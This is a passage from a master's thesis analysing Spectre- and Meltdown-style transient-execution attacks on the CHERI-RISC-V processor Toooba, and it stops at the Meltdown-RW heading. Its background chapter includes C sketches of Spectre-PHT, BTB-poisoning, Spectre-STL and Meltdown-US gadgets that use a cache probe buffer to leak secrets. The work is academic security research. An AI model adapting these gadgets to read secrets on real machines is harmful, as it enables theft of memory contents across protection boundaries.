DEGREE PROJECT IN SCIENCE AND ENGINEERING, SECOND CYCLE, 30 CREDITS
STOCKHOLM, SWEDEN 2021

Analysis of Transient-Execution Attacks on the out-of-order CHERI-RISC-V Microprocessor Toooba

FRANZ ANTON FUCHS

KTH ROYAL INSTITUTE OF TECHNOLOGY
SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE

Analysis of Transient-Execution Attacks on the out-of-order CHERI-RISC-V Microprocessor Toooba

FRANZ ANTON FUCHS

Master in Computer Science
Date: January 27, 2021
Supervisor: Roberto Guanciale
Examiner: Mads Dam
School of Electrical Engineering and Computer Science
Host Organisation: University of Cambridge, Department of Computer Science and Technology
Swedish title: Analys av transient-execution attacker på out-of-order CHERI-RISC-V mikroprocessorn Toooba

Analysis of Transient-Execution Attacks on the out-of-order CHERI-RISC-V Microprocessor Toooba

Copyright © 2021 by Franz Anton Fuchs

All rights reserved. No part of this work may be reproduced or used in any manner without written permission of the copyright owner except for the use of quotations.

Abstract

Transient-execution attacks have been deemed a large threat to microarchitectures by research in recent years. In this work, I reproduce and develop transient-execution attacks against RISC-V and CHERI-RISC-V microarchitectures. CHERI is an instruction set architecture (ISA) security extension that provides fine-grained memory protection and compartmentalisation. I conduct the transient-execution experiments for this work on Toooba – a superscalar out-of-order processor implementing CHERI-RISC-V. I present a new subclass of transient-execution attacks dubbed Meltdown-CF (Capability Forgery). Furthermore, I reproduced all four major Spectre-style attacks and important Meltdown-style attacks. This work analyses all attacks and explains the outcome of the respective experiments based on architectural and microarchitectural decisions made by their developers. While all four Spectre-style attacks could be successfully reproduced, the cores do not appear to be vulnerable to prior Meltdown-style attacks. I find that Spectre-BTB and Spectre-RSB, as well as the newly developed transient-execution attack subclass Meltdown-CF, pose a large threat to CHERI systems. Moreover, all four major Spectre-style attacks and all attacks of the Meltdown-CF subclass violate CHERI's security model and therefore require security mechanisms to be put in place.

Sammanfattning

Transient-execution attacks have constituted a large threat to microarchitectures in recent years' research. In this thesis, I reproduce and develop transient-execution attacks against RISC-V and CHERI-RISC-V microarchitectures. CHERI is an instruction set architecture (ISA) security extension that provides fine-grained memory protection and compartmentalisation. In the thesis, I conduct transient-execution experiments on Toooba – a superscalar out-of-order processor that implements CHERI-RISC-V. I present a new kind of transient-execution attack called Meltdown-CF (Capability Forgery). In addition, I have reproduced the four major Spectre-style attacks and important Meltdown-style attacks. In the thesis, I analyse these attacks and explain the results of the experiments based on the architectural and microarchitectural decisions made by the respective developers. While the four Spectre-style attacks could be reproduced successfully, the processor cores do not appear to be vulnerable to earlier Meltdown-style attacks. I conclude that Spectre-BTB and Spectre-RSB, as well as the new class of transient-execution attacks Meltdown-CF, pose a large threat to CHERI systems. However, the four major Spectre-style attacks and all attacks of the Meltdown-CF type violate CHERI's threat model and therefore require security mechanisms to be put in place.

Acknowledgements

I would like to thank:

• Simon W. Moore, my supervisor at Cambridge, who – even though the circumstances were not in our favour – believed in me and gave me the opportunity to conduct my work remotely. Furthermore, he provided lots of feedback throughout close and regular supervision sessions.

• Jonathan Woodruff, my advisor, who spent many hours explaining various concepts to me, was always happy to discuss my ideas, and provided feedback and inspirations that heavily impacted my work.

• Peter Rugg, Alexandre Joannou, Jessica Clarke, Marno van der Maas, and others who assisted me in solving a wide range of problems and made me rethink my approaches and ideas.

• Robert N. M. Watson and the entire CHERI team who warmly welcomed me into the team and created a helpful and encouraging atmosphere.

• Roberto Guanciale, my supervisor at KTH, who made it possible to conduct this thesis work within the CHERI group and supported me through the entire project by providing important high-level feedback.

Contents

1 Introduction
  1.1 Research Question and Scope
  1.2 Contributions
  1.3 Figures and Permissions
  1.4 Outline

2 Background
  2.1 Microarchitectural Background
    2.1.1 RISC-V
    2.1.2 Caches and Memory
    2.1.3 Out-of-order Execution
    2.1.4 Speculative Execution
    2.1.5 Memory Disambiguation
  2.2 Transient-Execution Attacks
    2.2.1 Spectre Attacks
    2.2.2 Meltdown Attacks
    2.2.3 Timing Side Channels
  2.3 Security Mechanisms
    2.3.1 Tagging Microarchitectural State
    2.3.2 Special Instructions
  2.4 CHERI
    2.4.1 CHERI Abstract Model
    2.4.2 CHERI-RISC-V
    2.4.3 CHERI-RISC-V Hardware
    2.4.4 CHERI Software Stack
    2.4.5 CHERI Security Model
  2.5 Related Work


3 Methods
  3.1 Toooba
  3.2 Research Methodology
  3.3 Common Mechanisms
    3.3.1 Flushing Caches
    3.3.2 Timing Measurements

4 RISC-V Results
  4.1 Spectre Attacks
    4.1.1 Spectre-PHT
    4.1.2 Spectre-PHT-Write
    4.1.3 Spectre-BTB
    4.1.4 Spectre-RSB
    4.1.5 Spectre-STL
  4.2 Meltdown Attacks
    4.2.1 Meltdown-US
    4.2.2 Meltdown-GP

5 CHERI-RISC-V Results
  5.1 Spectre Attacks
    5.1.1 Spectre-PHT
    5.1.2 Spectre-PHT-CHERI-Write
    5.1.3 Spectre-BTB on CHERI-Sandboxes
    5.1.4 Priv-Mode Attacks
    5.1.5 Spectre-RSB
    5.1.6 Spectre-STL
  5.2 Meltdown Attacks
    5.2.1 Meltdown-US-CHERI
    5.2.2 Meltdown-GP-CHERI
    5.2.3 Meltdown-CF

6 Discussion
  6.1 SinglePCC
    6.1.1 Mechanism
    6.1.2 Testing SinglePCC
    6.1.3 Hardening SinglePCC
    6.1.4 Spectre-BTB in Kernel Code
  6.2 Preventing Meltdown-CF
  6.3 Ethics and Sustainability
  6.4 Future Work

7 Conclusions

Bibliography

A Full C Attack

B Full CHERI-RISC-V Attack

Acronyms

ABI Application Binary Interface

ALU Arithmetic Logic Unit

ASID Address Space Identifier

ASR Access System Registers

BHT Branch History Table

BOOM Berkeley Out-of-Order Machine

BTB Branch Target Buffer

CHERI Capability Hardware Enhanced RISC Instructions

CID CHERI Compartment Identifier

CISC Complex Instruction Set Computing

CSR Control and Status Register

DDC Default Data Capability

FPGA Field Programmable Gate Array

FPU Floating Point Unit

HDL Hardware Description Language

ILP Instruction-Level Parallelism

IR Intermediate Representation

ISA Instruction-Set Architecture

LFB Line Fill Buffer

LLC Last Level Cache

LSB Least Significant Bit

LSQ Load-Store Queue

MMU Memory Management Unit

MSB Most Significant Bit

PCC Program Counter Capability

PHT Pattern History Table

PTE Page Table Entry

RAS Return Address Stack

RIDL Rogue In-Flight Data Load

RISC Reduced Instruction Set Computing

ROB Reorder Buffer

ROP Return-Oriented Programming

RSB Return Stack Buffer

SCR Special Capability Register

STL Store-To-Load

SUM Supervisor User Memory

TLB Translation Lookaside Buffer

Chapter 1

Introduction

Memory safety in general has been one of the most difficult security problems in secure computing. One prominent bug gives a good example of the severity of memory safety problems and explains the need for strong memory safety [1]. One approach to mitigate these kinds of attacks is Cyclone – a dialect of C that aims to achieve memory safety [2]. Similar approaches are CCured [3], which aims to enhance type-safety of C programs, and Checked C [4], which helps to guarantee spatial memory safety for C programs.

Another approach to implement memory safety is in-memory capability systems, which enforce memory accesses through capabilities in place of integer addresses. The idea of capability systems is not new but has existed for more than forty years, e.g., the CAP Computer [7] or Ackerman's architecture [8]. However, capability systems have never been commercially successful. The CHERI project, started in 2010, revived the idea of capability systems and has had a large impact on the field. The main idea of CHERI is to effectively ensure spatial and temporal memory safety. CHERI systems can mitigate attacks targeting spatial or temporal memory safety vulnerabilities.

However, in January 2018, a new class of attacks called transient-execution attacks was published. These attacks had a major impact on the processor industry and pose a large threat to CHERI systems as they can circumvent the security mechanisms in place. Transient-execution attacks have only partly been evaluated on RISC-V and not at all on CHERI-RISC-V systems. Therefore, the question remains whether these attacks are also possible on RISC-V and CHERI-RISC-V systems, which this thesis aims to answer.


1.1 Research Question and Scope

The main research question evaluated throughout the course of this thesis is: Is the out-of-order CHERI-RISC-V processor Toooba vulnerable to transient-execution attacks? In order to answer that question, I will attempt to reproduce all major transient-execution attacks in both RISC-V and CHERI-RISC-V. This work is limited to attacks that include transiently executed instructions revealing secrets. Attacks that infer information about the program's state without transient execution, e.g., BranchScope [9], are not part of this thesis work. Developing and implementing mitigation mechanisms is out of scope. However, it is part of this work to point out possibilities for mechanisms that can be implemented. Furthermore, I consider it in scope to test whether existing mitigation mechanisms effectively mitigate transient-execution attacks. However, it is considered out of scope to thoroughly test and evaluate mitigation mechanisms, including a performance analysis and the advantages and drawbacks of each mechanism.

1.2 Contributions

In this work, I make the following contributions:

• The first work to completely reproduce the major transient-execution attacks on a RISC-V microarchitecture.

• The first-ever work to reproduce the major transient-execution attacks on a CHERI-RISC-V microarchitecture.

• Development of the new subclass of Meltdown-CF attacks.

• Developing an extensible framework for exploring transient-execution attacks and creating a platform to research mitigation mechanisms in RISC-V and CHERI-RISC-V microarchitectures.

• Testing and hardening the SinglePCC implementation in Toooba.

1.3 Figures and Permissions

All figures with a citation are used with the permission of the publisher. Figures without a citation were created by me.

1.4 Outline

In Chapter 2, I explain the background of this thesis work, including modern microarchitectures, transient-execution attacks, and the CHERI-RISC-V architecture. In Chapter 3, I present the research methods applied in the course of this thesis. This is followed by Chapter 4 and Chapter 5, which give an overview of the attacks included in the framework for RISC-V and CHERI-RISC-V microarchitectures, respectively. Chapter 6 discusses the results and their implications. The thesis is concluded in Chapter 7.

Chapter 2

Background

In this chapter, I introduce the microarchitectural background of transient-execution attacks, followed by the attacks themselves. Next, I describe CHERI systems, which will be the basis for the research done throughout the thesis work.

2.1 Microarchitectural Background

Microarchitectures use sophisticated mechanisms in order to improve overall performance. In industry, the focus has been on performance, but not on security. This led to the emergence of transient-execution attacks, which exploit these mechanisms. This section describes RISC-V and the microarchitectural mechanisms that form the basis of transient-execution attacks.

2.1.1 RISC-V

RISC-V [10] is an extensible open-source Instruction-Set Architecture (ISA) that has received a great deal of attention in academia and is gaining traction in industry. An ISA describes an abstract model of the computer, including the architectural state of the machine, instructions to change the state, registers, memory access, and other input/output specifications. It is important to distinguish between the terms architecture and microarchitecture. A microarchitecture is an implementation of an architecture. Therefore, binary compatibility exists between microarchitectures that implement the same architecture. A program causes visible changes to the architectural state, but the microarchitectural state is mainly invisible to the program.


The RISC-V ISA is a Reduced Instruction Set Computing (RISC) architecture, which means that it aims to have a small set of instructions where each instruction does only one task. In contrast, instructions on Complex Instruction Set Computing (CISC) architectures can do several operations within a single instruction. RISC-V has similarities to other RISC architectures, e.g., MIPS and ARM, but it differs mainly because of its modular nature. The unprivileged specification [11], containing information on the user-space instructions, describes a minimal instruction set – the base integer instruction set – that has to be implemented on all microarchitectures, and several other extensions that can be implemented. This is the reason why RISC-V is considered a design space.

The current unprivileged specification defines 13 extensions [11]. Widely implemented are the standard extensions for integer multiplication and division, atomic instructions, single-precision floating-point, double-precision floating-point, and compressed instructions. RISC-V extensions are abbreviated with capital letters, e.g., A for the standard extension for atomic instructions. Furthermore, RISC-V defines three different register bit widths: 32, 64, and 128 bits. RISC-V microprocessors have a name tag to specify which extensions and features of RISC-V they implement, e.g., RV32IACMU, where RV32 stands for RISC-V with 32-bit wide registers and all following capital letters identify the instruction set extensions this microprocessor implements. The capital letter G is used to refer to the general-purpose ISA, which includes the integer operations, multiplication and division operations, atomic operations, single-precision floating-point operations, and double-precision floating-point extensions, abbreviated as "IMAFD".

The RISC-V privileged specification [12] defines three privilege modes: M(achine), S(upervisor), and U(ser). One additional privilege mode might be added in the future, as it is held reserved in the specification. Machine mode represents the highest privilege level and user mode the lowest privilege level. As with the base integer instruction set, every RISC-V implementation needs to implement machine mode. The implementation of other modes is an implementation choice. When supervisor mode is implemented, this is labeled with an S in the name tag. For user mode, the letter U is added to the name tag. In machine mode, addresses are interpreted as physical addresses. In supervisor mode, address translation is conducted. The main information for address translation, e.g., the Address Space Identifier (ASID), is stored in the satp register, which is the supervisor address translation and protection register. The privileged RISC-V architecture manual [12] specifies 32-bit, 39-bit, and 48-bit wide virtual addresses.

Machine mode and supervisor mode define new registers for special purposes, which are called Control and Status Registers (CSRs) in RISC-V. These registers are used to get information about the microarchitecture, but are also used to control the architecture, e.g., trap handling. The chapters Machine-Level ISA and Supervisor-Level ISA of the privileged specification [12] contain further information on exception handling and related topics.

2.1.2 Caches and Memory

DRAM access times are slow compared to the clock frequency of the processor. If a load issued by the processor had to pay the full load penalty for each load operation, performance would be significantly decreased. This creates the need for low-latency memory. One solution is caches that hold the most recently accessed data. The access time to these data will be small, but access times for other data that is not stored in caches will still be large. Modern processors have multiple cache levels that differ in size, speed, and cost. The Level-1 (L1) cache has the fastest access time, but is also the smallest. The cache on the highest level – also referred to as the Last Level Cache (LLC) – has the slowest access time, but can store the most data. In general: the greater the level number, the slower the access times become, but the more data the cache can store. Data is stored in caches in the form of cache lines. One cache line contains multiple adjacent memory words. Many modern processors have inclusive caches, which means that every cache line stored in a lower level is also present in every cache level above that. In modern processors, every core has its own L1 cache and the LLC – the slowest and biggest cache – is shared among all cores. The intermediate caches may be configured exclusive to a core or shared, depending on the vendor's policy. Furthermore, caches are well suited to the principle of locality, which programs exhibit. Temporal locality describes the situation when a program accesses memory at the same address more than once, and spatial locality is shown when the program accesses memory at addresses near an address already accessed. By storing the cache lines of the most recently accessed data, caches manage to improve performance for programs that exhibit both temporal and spatial locality.
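
To make the two kinds of locality concrete, the short C sketch below walks a buffer in a way that caches reward; the function and buffer names are purely illustrative.

#include <stddef.h>

/* The sequential walk exhibits spatial locality (neighbouring elements
 * share a cache line); repeating the walk exhibits temporal locality
 * (recently used lines are hit again before they are evicted).        */
long sum_twice(const long *buf, size_t n)
{
    long sum = 0;
    for (int pass = 0; pass < 2; pass++)    /* temporal locality */
        for (size_t i = 0; i < n; i++)      /* spatial locality  */
            sum += buf[i];
    return sum;
}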

2.1.3 Out-of-order Execution

A microprocessor executes a program, which is defined by a sequence of instructions as it is written by the programmer. This order of instructions defines the program's behaviour and is called in-order or program-order.

Simple microprocessors execute instruction by instruction following this order. However, modern microprocessors incorporate out-of-order execution, which means that instructions are microarchitecturally not executed in order. This is used to enhance performance. The principle of out-of-order execution is based on the fact that instructions that do not depend on each other can be executed in parallel and in any arbitrary order, as the final result will not change. The first algorithm for full out-of-order execution was demonstrated by Tomasulo [13]. The main goal of modern processors is to hide the latency of instructions, e.g., loads and stores that miss the L1 data cache, and to extract Instruction-Level Parallelism (ILP) by executing other independent instructions in the meantime. This increases the overall performance of the microprocessor. Out-of-order execution increases the divergence between the architectural and microarchitectural state. An instruction becomes visible when it changes the architectural state. Instructions must become visible in program-order, otherwise the new state diverges from a valid architectural state, which means that a different program behaviour appears. An instruction retires – also called commits – in the cycle when it changes the architectural state. Instruction commits are in sequential order, matching the programmer's model presented in the ISA.

2.1.4 Speculative Execution

An important performance criterion is to keep the processor's pipeline filled at all times. The processor needs to fetch the correct instructions for that. The control-flow of a program depends on multiple parameters, including user input. Control-flow is steered by direct and indirect branches. A direct branch is a jump to an address that is determined by an offset of the branch instruction. An indirect branch is a jump to a value stored in a register. In order to fetch the correct instructions, the microprocessor would need to know whether a branch is taken and what its jump target is, which is not possible in general. Therefore, modern processors use branch prediction. The processor will predict the information it needs. Following its prediction, the processor will execute the instructions it thinks are correct. If the processor's prediction turns out to be right, meaning that the predicted values match the program's real values, the instructions can commit. Otherwise, the instructions need to be rolled back. Therefore, speculative execution is not visible on the architectural level. If the microprocessor's speculation is successful, this can lead to a large performance gain. A speculative microprocessor has dedicated units that handle prediction. These units differ in which kinds of branches

they are responsible for predicting.

Branch Predictors

Branch prediction can be either static or dynamic. A static branch predictor always makes the same decision and does not change during the runtime of a program. On the other hand, a dynamic branch predictor may change its prediction as it learns at runtime. I will focus on dynamic branch prediction as it is the most used technique in modern microprocessors. A branch predictor mainly consists of two sub-units. The Pattern History Table (PHT) stores the history of a particular branch. Having that information, the processor predicts whether the branch is taken or not. This can be either local or global. A local PHT stores only the history of one branch, e.g., strongly taken, whereas a global PHT also takes other branches and their outcomes into account. The processor also has a Branch Target Buffer (BTB), which stores the branch target – the location that the control-flow will go to if the branch is taken. A microprocessor can also implement both local and global PHTs and choose which one to use during runtime depending on the misprediction ratio. This is called a Tournament Predictor [14].

In most microprocessors, branch prediction covers all direct and indirect branch instructions with the exception of call and return instructions. These are handled in separate logic, as presented in the paragraph below. However, instances of both instructions can also be placed in the BTB, e.g., as a mitigation mechanism against attacks or because the microprocessor does not have dedicated logic for these two instructions.
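
A common way to build the local prediction described above is one 2-bit saturating counter per PHT entry. The following C model is only an illustration of that update rule; the table size, the indexing by branch address, and the field widths are assumptions and do not describe Toooba's actual predictor.

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define PHT_ENTRIES 1024                    /* assumed table size */

/* One 2-bit saturating counter per entry:
 * 0 = strongly not taken, 1 = weakly not taken,
 * 2 = weakly taken,       3 = strongly taken. */
static uint8_t pht[PHT_ENTRIES];

static size_t pht_index(uint64_t pc)
{
    return (pc >> 2) & (PHT_ENTRIES - 1);   /* simple hash of the branch address */
}

bool pht_predict(uint64_t pc)
{
    return pht[pht_index(pc)] >= 2;         /* predict taken in the upper half */
}

void pht_update(uint64_t pc, bool taken)
{
    uint8_t *ctr = &pht[pht_index(pc)];
    if (taken && *ctr < 3)
        (*ctr)++;                           /* saturate at strongly taken     */
    else if (!taken && *ctr > 0)
        (*ctr)--;                           /* saturate at strongly not taken */
}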

Return Stack Buffers

A Return Stack Buffer (RSB) – also called a Return Address Stack – is a hardware buffer for return addresses. For every call to a function, the return address is pushed onto this stack. Every return instruction pops one return address. The return address is also stored on the software stack. The main goal addressed by an RSB is to enhance performance. Loading the return address from the software stack can lead to stall cycles, e.g., because the branch needs to be taken early in the pipeline and the load can only be performed later in the pipeline. Therefore, microprocessors use an RSB to predict the return address and keep the pipeline filled with instructions. If the addresses on the RSB and the software stack match, a performance gain is achieved. Otherwise, speculatively executed instructions need to be rolled back.

sd t0, 0(a0)
ld t1, 0(a1)

Figure 2.1: The RISC-V store and load instructions are dependent if a0 and a1 are resolved to the same physical address.

2.1.5 Memory Disambiguation

When reordering instructions, the microprocessor has to ensure that it does not break any dependencies. For a store and a load operation, a true dependency exists if the load returns the value from memory that was written by the store operation preceding the load, where both operations access the same address. The store and load operations shown in Figure 2.1 are dependent if a0 and a1 are resolved to the same physical address. The process of detecting true dependencies between memory operations is called memory disambiguation. However, at the point of reordering instructions, the microprocessor might not know the full addresses yet, e.g., because they are loaded from memory and these loads have not finished yet, or the register is being updated and will be made available on a forwarding path. Therefore, the microprocessor cannot guarantee that these instructions are independent. However, in order to achieve high performance goals, loads have to be executed as early as possible such that a possible miss penalty can be hidden. To enhance performance, modern microprocessors use memory disambiguation with speculation, as first presented by Gallagher et al. [16]. The microprocessor assumes that the load is not dependent on the store and executes the load and instructions dependent on the load speculatively before the store. When the address of the store is resolved, the microprocessor checks whether there in fact is a dependency and, if so, re-executes the load and its dependent instructions.

2.2 Transient-Execution Attacks

Transient instructions are instructions that are erroneously executed by the processor due to out-of-order or speculative execution but would not have appeared otherwise. Transient execution is not visible on the architectural level as all transient instructions should not have been executed, are rolled back, and never commit to the architectural state. However, transient execution has effects on the microarchitectural state. These state changes can be read through side channels. This is the basis of transient-execution attacks. They trick the

microprocessor into executing several instructions transiently and then gain knowledge through side channels. The most used side channel for speculative attacks is timing. There exist other side channels like power consumption or heat dissipation, but in this work I will only use timing side channels. The choice to only use timing side channels is supported by prior publications on transient-execution attacks, in which timing side channels have proved to be effective [18, 19, 20]. Transient-execution attacks can be subdivided into Spectre attacks and Meltdown attacks [19]. More sophisticated classifications [20] exist, but are not needed for this thesis work.

2.2.1 Spectre Attacks

Spectre attacks focus on microarchitectural state changes due to misprediction of control or data flow. Spectre attacks were first demonstrated by Kocher et al. [22]. They can further be subdivided into four categories according to which part of speculative execution they seek to exploit.

Spectre-PHT

As the name suggests, Spectre-PHT aims to attack the Pattern History Table. The basic attack principle is to train the history of a branch such that the prediction's outcome follows the attacker's intentions. A simple example – derived from [22] – is shown in Figure 2.2. The if statement will result in a branch instruction. The first step of the attacker is to train the PHT of this branch such that it is strongly predicted as not taken, which (for the branch the compiler emits to skip the body) means that the body is speculatively executed as if the condition were true. This can be accomplished by calling the code with this if statement with values for the index i that are less than array_size. The next step is to conduct the actual attack. The attacker can provide any desired value for i, as the branch prediction will speculatively execute the body of the if statement. Therefore, the attacker can trick the microprocessor into executing an arbitrary load without the bounds being checked first. Using the data retrieved from the load from sec_arr as an index into a user-accessible array usr_arr will change the microarchitectural state. Later, the microprocessor will detect the misprediction and roll back the instructions. However, the microarchitectural side effects have already taken place and stay visible even though none of the speculatively executed instructions committed. Spectre-PHT is also known as Spectre v1 and is presented as such in [22].

int j;
int r = 0;
if (i < array_size) {
    j = sec_arr[i];
    r = usr_arr[j];
}

Figure 2.2: Spectre-PHT example written in C.
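
Putting the two phases around Figure 2.2 together, a minimal sketch of the attack driver could look as follows. The names victim and spectre_pht and the probe buffer are illustrative; unlike Figure 2.2, the secret byte is scaled by a cache-line size so that each value maps to its own line, and the flush and reload/timing steps (Sections 3.3.1 and 3.3.2) are only indicated as comments.

#include <stddef.h>
#include <stdint.h>

extern uint8_t sec_arr[];            /* secret data, not directly accessible          */
extern size_t  array_size;
extern uint8_t usr_arr[256 * 64];    /* attacker-visible probe buffer, 64-byte lines  */

/* The gadget of Figure 2.2, wrapped in a function. */
void victim(size_t i)
{
    if (i < array_size) {
        int j = sec_arr[i];
        volatile uint8_t r = usr_arr[j * 64];   /* encodes the secret byte in the cache */
        (void)r;
    }
}

/* Attacker driver: train the PHT, then supply an out-of-bounds index. */
void spectre_pht(size_t malicious_i)
{
    for (int t = 0; t < 100; t++)
        victim((size_t)t % array_size);  /* training: index always in bounds */

    /* flush array_size and usr_arr from the caches (cf. Section 3.3.1)      */
    victim(malicious_i);                 /* bounds check mispredicted: body runs transiently */
    /* reload usr_arr line by line and time each access (cf. Section 3.3.2)  */
}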

Spectre-BTB

As opposed to Spectre-PHT, Spectre-BTB attacks the Branch Target Buffer. A BTB has only a limited number of entries. Therefore, the target address of a branch instruction has to be mapped to an entry by a hash function. In the original form, as demonstrated by Kocher et al. [22], the small size of the BTB is exploited by attackers: because the BTB is small, the hash function can lead to frequent collisions. When a branch is seen by the microprocessor, it looks up the corresponding entry in the BTB and uses this target address for the prediction. As for Spectre-PHT, Spectre-BTB consists of two phases. First, the attacker injects a malicious branch target into the BTB at the entry of a branch executed by the victim program. Figure 2.3 shows two branch instructions, which I assume to be mapped to the same BTB entry. The injection can be done by executing the second branch instruction, which will overwrite the entry of the first one. In the second phase, the attacker triggers the first instruction to be executed. Speculatively, the branch target address in the BTB entry – which is the branch target of the second branch instruction – will be used and the control-flow will be speculatively directed there. This target is attacker controlled and will leak the desired information. This variant is called out-of-place Spectre-BTB.

Another variant is in-place Spectre-BTB. In this case, only one branch instruction is used. The attacker manages, e.g., through user input, to poison the BTB entry of this branch instruction. The next time the code with this branch instruction is executed, the branch prediction will direct the control-flow speculatively to attacker-intended code, which the attacker can use to leak information. Spectre-BTB is also known as Spectre v2 and is presented as such in [22].

00000008: 00060067 jr a2

...

00001008: 00078067 jr a5

Figure 2.3: Indirect jumps mapped to the same BTB entry.
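
At the C level, the colliding indirect jumps of Figure 2.3 typically come from calls through function pointers. The sketch below shows the out-of-place variant under the assumption that the attacker's and the victim's call sites happen to map to the same BTB entry (which in a real attack has to be arranged via the code addresses); all function names are illustrative.

#include <stdint.h>

extern uint8_t usr_arr[256 * 64];    /* probe buffer shared with the attacker */
extern uint8_t secret;               /* value reachable by the victim only    */

void benign(void) { }                /* the target the victim architecturally calls */

/* Attacker-chosen code: leaks `secret` into the cache when reached transiently. */
void gadget(void)
{
    volatile uint8_t tmp = usr_arr[secret * 64];
    (void)tmp;
}

/* Injection phase: the attacker repeatedly executes an indirect call to
 * gadget(), training the BTB entry that (by assumption) aliases with the
 * victim's call site below.                                              */
void train_btb(void)
{
    void (*fp)(void) = gadget;
    for (int i = 0; i < 100; i++)
        fp();
}

/* Victim call site: architecturally calls benign(), but the poisoned BTB
 * entry makes the front end speculatively fetch gadget() until the real
 * target is resolved and the transient work is squashed.                 */
void victim_call(void (*fp)(void))
{
    fp();                            /* fp == benign at attack time */
}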

Spectre-RSB

Spectre-RSB attacks were discovered later than the original Spectre attacks and aim to attack speculative execution involving the Return Stack Buffer [23, 24]. There exist multiple flavours of this attack that use subtleties of a particular microarchitecture, but all have the same goal in common. Spectre-RSB attacks target a mismatch between the address on the hardware return stack and the address on the software return stack. The microprocessor will use the address in the RSB and speculatively direct the control-flow there. The attack consists of an injection phase, which changes the entry at the current index of the RSB, and a side-channel sending phase, which triggers side effects by speculatively returning to the injected address.

Spectre-STL

Spectre-Store-To-Load (STL) differs substantially from the other Spectre attacks as it does not attack control-flow, but data flow. As described in Section 2.1.3, the microprocessor wants to execute load instructions as early as possible to hide the load penalty. A load instruction can pass a store instruction if they are independent. Load and store instructions are independent if their memory addresses differ. However, memory addresses might not be fully available to the microprocessor when it needs to make the decision whether the load is allowed to pass. Therefore, the microprocessor speculates whether the addresses are independent. Sophisticated processors have dedicated memory disambiguation logic for this purpose, as described in Section 2.1.5. An example of the attack is shown in Figure 2.4. The first step is to trick the microprocessor into predicting that addr1 and addr2 are different. Then the load from addr2 will speculatively be executed before the store to addr1. In the example, the memory at this address is overwritten with zeros. The attacker can manage to speculatively read out the stale data before it is overwritten. This attack is also known as Spectre v4 and was first demonstrated by Horn [25].

*addr1 = 0x00;
val = *addr2;

Figure 2.4: Spectre-STL example in C.
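
Expanding Figure 2.4 slightly, the sketch below shows how the stale value returned by the bypassing load can be encoded into the cache before the misspeculation is detected; the aliasing pointers and the probe buffer are illustrative assumptions.

#include <stdint.h>

extern uint8_t usr_arr[256 * 64];    /* probe buffer for the cache side channel */

/* addr1 and addr2 refer to the same secret byte, but through two pointers
 * whose equality the memory-disambiguation logic cannot prove early.      */
void stl_gadget(volatile uint8_t *addr1, volatile uint8_t *addr2)
{
    *addr1 = 0x00;                              /* architecturally overwrites the secret  */
    uint8_t val = *addr2;                       /* may bypass the store speculatively and
                                                   return the stale (secret) value         */
    volatile uint8_t tmp = usr_arr[val * 64];   /* transiently encodes the stale value     */
    (void)tmp;
}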

Rogue In-Flight Data Load

Rogue In-Flight Data Load (RIDL) [26] is an attack on microprocessors that use Line Fill Buffers (LFBs). An LFB is used in microprocessors in order to prevent caches from blocking when a miss occurs. In order to achieve high performance goals, microprocessors speculatively use in-flight store data for loads without checking permissions in the first step. A store is in flight when it is currently in the LFB but has not committed yet, e.g., due to a cache miss. Another process running on the same hardware can observe this in-flight store by performing a random load and leaking its value through a side channel. The general attack idea is as follows: a victim process performs a memory access to secret data. This memory access will be handled via LFBs and an entry holding the secret data will be allocated. Next, an attacker performs a memory access, which will be speculatively satisfied by an LFB entry. This returns the secret data to the attacker, who uses it as an index into a buffer. This will load a line into the caches and therefore reveal the secret value to the attacker. Eventually, the processor will roll back the execution because of the misspeculation, but the effects on the cache will remain. With this attack, one can leak entire pages from another running process.

2.2.2 Meltdown Attacks

Meltdown attacks focus on microarchitectural state changes due to transient execution of instructions following a faulting instruction. Therefore, Meltdown attacks do not attack branch prediction features of the microprocessor, but out-of-order execution. They also rely on the point at which access rights are checked and hardware exceptions are raised.

Meltdown-US

The original Meltdown attack – demonstrated by Lipp et al. [27] – seeks to access a page intended for supervisor use only from user space. Therefore, this attack is also called Meltdown-US (User/Supervisor). The goal of the attack is to read out supervisor-only memory without having a sufficient privilege level. The attack exploits the fact that the protection domain privilege is not checked

when actually accessing the page, but in later pipeline stages. Eventually this instruction will fault and raise a hardware exception, but in the meantime transiently executed instructions following the faulting instruction will reveal the sought value through side channels. By conducting this attack multiple times, an attacker can read out the entire kernel memory of an operating system [27].
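
The core of a Meltdown-US proof of concept is a faulting load whose result feeds a dependent, cache-encoding load before the fault becomes architecturally visible. The sketch below assumes the fault is absorbed with a SIGSEGV handler – one common way to survive it in user space – and that the byte is afterwards recovered with the timing technique of Section 2.2.3; the kernel address and all names are placeholders.

#include <setjmp.h>
#include <signal.h>
#include <stdint.h>

extern uint8_t usr_arr[256 * 64];   /* attacker-controlled probe buffer */

static sigjmp_buf retry;

static void segv_handler(int sig)
{
    (void)sig;
    siglongjmp(retry, 1);           /* recover from the architectural fault */
}

/* Attempts to transiently read one byte from a supervisor-only address. */
void meltdown_us(uintptr_t kernel_addr)
{
    signal(SIGSEGV, segv_handler);
    if (sigsetjmp(retry, 1) == 0) {
        /* The access faults, but a vulnerable core forwards the loaded
         * value to the dependent load before the exception is taken.   */
        uint8_t secret = *(volatile uint8_t *)kernel_addr;
        volatile uint8_t tmp = usr_arr[secret * 64];
        (void)tmp;
    }
    /* afterwards: time the reload of every usr_arr line to recover the byte */
}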

Foreshadow Attacks

Van Bulck et al. presented Foreshadow [28], which has the same goal as Meltdown-US – reading out data without having permission to do so. However, Foreshadow targets SGX enclaves [29] and exploits a different mechanism than Meltdown. Foreshadow is tailored to microprocessors that do not allow large speculation windows and where the data to be leaked must reside in the L1 cache. However, it is possible to access the L1 cache speculatively even though access is denied. This is caused by the fact that data access and permission control are conducted in parallel in an exploitable microprocessor [30]. Therefore, even though access is denied, the value is fetched into a register and can be leaked through a side channel. Later, Weisse et al. [31] presented Foreshadow-NG, an extension of Foreshadow that makes it possible to break operating system or hypervisor abstractions.

Meltdown-GP

The GP (General Protection) variant of Meltdown enables an attacker to access privileged system registers. When a system register is accessed, the microprocessor will check whether the current privilege is sufficient to access it. If this is not the case, an exception will be thrown. Meltdown-GP exploits the fact that some microarchitectures throw the exception late or allow computation on the system register value before stopping execution of the instruction sequence. This allows the attacker to leak the system register's value through a side channel. This attack was erroneously named Spectre v3a in early documents [32, 33].

Meltdown-RW

